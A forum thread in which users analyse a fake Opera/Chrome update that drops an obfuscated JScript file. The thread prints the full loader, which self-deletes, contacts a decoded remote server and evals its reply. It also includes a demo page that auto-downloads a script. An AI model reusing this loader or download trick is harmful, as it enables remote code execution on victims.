Do more on the web, with a fast and secure browser!

Download Opera browser with:

  • built-in ad blocker
  • battery saver
  • free VPN
Download Opera
  • @operaequalstrash By default Opera will show the save as dialog for executable files, that's why I asked.

  • @operaequalstrash So you searched for something on Google and, in the results page, clicked on the one that looked like the page you were searching for. Then, that page showed a pop-up or a message saying that you need to upgrade Opera?

  • @operaequalstrash said in Drive-by download attack:

    @burnout426 https://www.google.com/url?sa=t&source=web&rct=j&url=https://fantasticservicesgroup.com.au/blog/how-to-clean-mould-off-bathroom-sealant/%23:~:text%3Dsoda and vinegar.-,Vinegar,and finally rinse with water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7

    I was able to trigger the update page for Chrome. There was no automatic download though. I will keep trying to get the false update page in Opera. However, in Chrome, clicking on the "update chrome" link:

    <a class="button eula-download-button download-button desktop-only hide-cros" href="blob:https://fantasticservicesgroup.com.au/2effd3cc-8fe0-42d0-9358-a209738ee480" id="buttonDownload" download="Chrome.db7e57.zip">Update Chrome</a>
    

    downloads a blob that represents a zip file. In the zip file is:

    Chrome.Update.60c91c.js:

    try {
        var kasa = new ActiveXObject('Scripting.FileSystemObject');
        kasa['DeleteFile'](this['WScript']['ScriptFullName'], true);
    }
    catch (e) {}
    
    var azke = ofznaboqag();
    var bjaqug = rhuxikbmicy(azke);
    while (azke < bjaqug) {
        azke = ofznaboqag();
        this['WScript']['Sleep'](1000);
    }
    
    function rhuxikbmicy(cnifloefpi) {
        return cnifloefpi + 10000;
    }
    
    function ofznaboqag() {
        return new Date()['getTime']();
    }
    
    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');
    
    var mopemgeyb = ['a', tid];
    
    
    
    sendRequest(mopemgeyb);
    
    function sendRequest(mopemgeyb, ypjaliv5) {
    
        if(typeof ypjaliv5 === 'undefined') { ypjaliv5 = false; }
    
        var ysviwknoer = '', lukyjiv = '', azhewuv, awkyjugav='eval';
    
        for (var rebusid3 = 0; rebusid3 < mopemgeyb['length']; rebusid3++) {
            ysviwknoer += rebusid3 + '=' + encodeURIComponent(''+mopemgeyb[rebusid3]) + '&';
        }
        ysviwknoer = fyup(ysviwknoer);
    
        try {
            var bospopibttu;
            bospopibttu = new ActiveXObject('MSXML2.XMLHTTP');
            bospopibttu['open']('POST', fguvakakam, false);
            bospopibttu['send'](ysviwknoer);
            if (bospopibttu['status'] == 200) {
                lukyjiv = bospopibttu['responseText'];
                if(lukyjiv) {
                    azhewuv = fwugym(lukyjiv);
                    if(ypjaliv5) {
                        return azhewuv;
                    }
                    else {
                        this[awkyjugav](azhewuv);
                    }
                }
            }
            
        } catch (e) {}
    
        return false;
        
    }
    
    
    
    
    function rnugma(rebusid3) {
        var hebod = '00'+rebusid3['toString'](16);
        hebod = hebod['substr'](hebod['length']-2);
        return hebod;
    }
    
    function fwugym(mpumeznxoxih) {
        var vjueqnuf, bvury9, rebusid3, lukyjiv = '';
    
        bvury9 = parseInt(mpumeznxoxih['substr'](0, 2), 16);
        vjueqnuf = mpumeznxoxih['substr'](2);
        
        for (rebusid3 = 0; rebusid3 < vjueqnuf['length']; rebusid3+=2) {
            lukyjiv += String['fromCharCode'](gcayhptecim(parseInt(vjueqnuf['substr'](rebusid3, 2), 16), bvury9));
        }
        
            
        return lukyjiv;
    }
    
    
    function fyup(mpumeznxoxih) {
        var bvury9 = 207, rebusid3, lukyjiv = '';
        
        for (rebusid3 = 0; rebusid3 < mpumeznxoxih['length']; rebusid3++) {
            lukyjiv += rnugma(mpumeznxoxih['charCodeAt'](rebusid3) ^ bvury9);
        }
    
        return (rnugma(bvury9)+lukyjiv);
    }
    
    
    
    function gcayhptecim(ebup, zavyb) {
        var amyn = '', rinnu, minif, rebusid3;
        ebup = nguho(ebup);
        zavyb = nguho(zavyb);
        for(rebusid3 = 0; rebusid3<ebup['length']; rebusid3++) {
            rinnu = ebup['substr'](rebusid3,1);
            minif = zavyb['substr'](rebusid3,1);
            if(rinnu=='0'){
                if(minif=='0'){
                    amyn+='0';
                }
                else {
                    amyn+='1';
                }
            }
            else {
                if(minif=='0'){
                    amyn+='1';
                }
                else {
                    amyn+='0';
                }
            }
        }
        
        return parseInt(amyn, 2);
    }
    
    
    function nguho(ebup) {
        ebup = (+ebup)['toString'](2);
        var epwryihno = '00000000' + ebup;
        epwryihno = epwryihno['substr'](epwryihno['length'] - 8);
        return epwryihno;
    }
    
    function kongahavha(imalsosu) {
        imalsosu = imalsosu.split('');
        var vhimylpi = '';
        for(var rwean=0; rwean<imalsosu['length']; rwean++) {
            if(rwean%2===1) vhimylpi += imalsosu[rwean];
        }
        vhimylpi = dyah(vhimylpi);
        return vhimylpi;
    }
    
    function dyah(cweawvyhco) {
        cweawvyhco = cweawvyhco.split('');
        var kogygku = '';
        for (var ajser = cweawvyhco['length'] - 1; ajser >= 0; ajser--) {
            kogygku += oqjrynixi(cweawvyhco, ajser);
        }
        return kogygku;
    }
    
    function oqjrynixi(ditew, aracfespy) {
        return ditew[aracfespy];
    }
    

    As in, it's an executable Javascript file (Jscript) for Windows that's dangerous as long as you have Wscript enabled.

    test.js:

    var text;
    text="Hello world!";
    WScript.Echo(text);
    

    If you create test.js and double-left-click on it and it shows a dialog with "Hello world!", Windows Scripting Host is enabled and you might want to disable it.

    If you never actually executed the Opera update js you got, you should be okay.

  • For:

    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');
    

    The functions translate that into:

    https://f2bd7a03.login.nuwealthmedia.com/1x1.gif
    500
    a2a40ab1
    

    Also, if you see in the code, it requests something from a server and gets a response back. You'll also see at the beginning of the code that the file is set to delete itself after it runs.

  • @leocg Yessir. The page that rendered was a somewhat official looking Opera update page that said my browser is out of date, click here to update. The js file just downloaded even without me clicking on anything...

  • @burnout426 it seems like WSH is enabled by default on Windows, and I had never disabled it when this drive-by happened. Either way, I secure erased my SSD, and reinstalled Win10 since there were some work files that are security sensitive.

    If Opera shows a save as dialog for executable files by default as @leocg mentioned, shouldn't it show a dialog for a Jscript file when a webpage is trying to download it onto my machine? I get that it isn't much of a concern unless I execute the downloaded file, but this is just another way for an attack to bypass the browser sandbox, and get one step closer to having it executed (whether by mistake by the user or whatever). I reported the incident to Opera.

  • @operaequalstrash You need to do anything to trigger the update message? I opened the link on Opera Stable 75 and Developer 77 and couldn't see anything related to Opera upgrade.

  • @leocg I didn't have to do anything special in Chrome. But, it only happened after a few times of loading the link and only happened once. I have yet to trigger it in Opera to see if the js file gets dumped by itself in the downloads folder without asking.

  • I don't know if this works for a remote html file, but it does for a local one:

    local.html

    <script>
        window.addEventListener("DOMContentLoaded", function() {
            var b = new Blob(['WScript.Echo("Hello World");']);
            var u = URL.createObjectURL(b, {type: "application/javascript"});
            var a = document.createElement("a");
            a.href = u;
            a.download = "evil.js";
            a.textContent = "Update";
            document.body.appendChild(a);
            a.click();
        }, false);
    </script>
    

    That will automatically dump evil.js in your download folder. You can double-left-click the file and Windows will ask you if you want to run it (as long as you didn't uncheck the "always ask" box in that dialog before).

    You do get a notification in Opera that the download happened. But in Chrome, in the notification, you get a warning and an option to discard the download.

    I can't say that this is how the site does it in Opera as I haven't been able to trigger the update page on that site in Opera.

  • @burnout426 the hijacked page must be doing a crude browser fingerprinting before rendering the fake update page, since you are getting one for Chrome, but not Opera, whereas I got one on Opera. All I can tell you about the condition that triggered the page for me on Opera was that I installed Opera 1 week prior to that, and everything was on its default setting - no additional plug ins.

    In fact, this situation is identical to this user's : https://forums.opera.com/topic/33351/opera-automatic-webpage-redirect-to-update-page-that-auto-downloaded-a-javascript-file

    He got the hijacked page on Opera, and you got the hijacked page on Chrome. I suspect that the hijacked page rotates the target browser so as not to alert the site admin that it was hijacked. That way if one user on Chrome gets the drive-by and alerts the admin only for the site admin to check out the site on Opera, he would see a normal page with no driveby and would more likely suspect that it was the user's machine that was hijacked rather than the site. Either way, at least I know that Chrome will ask it's users if he wants to proceed with the download, if there is an attempt at a drive-by download. So in this regard, Chrome isn't as trashy as Opera.

  • For my demo at least, if you goto the URL opera://settings/downloads and enable "Ask where to save each file before downloading", you'll get prompted to download the js file where you can cancel it.

  • @burnout426 That should be the default setting, given how easily hijacked pages can pull a drive-by.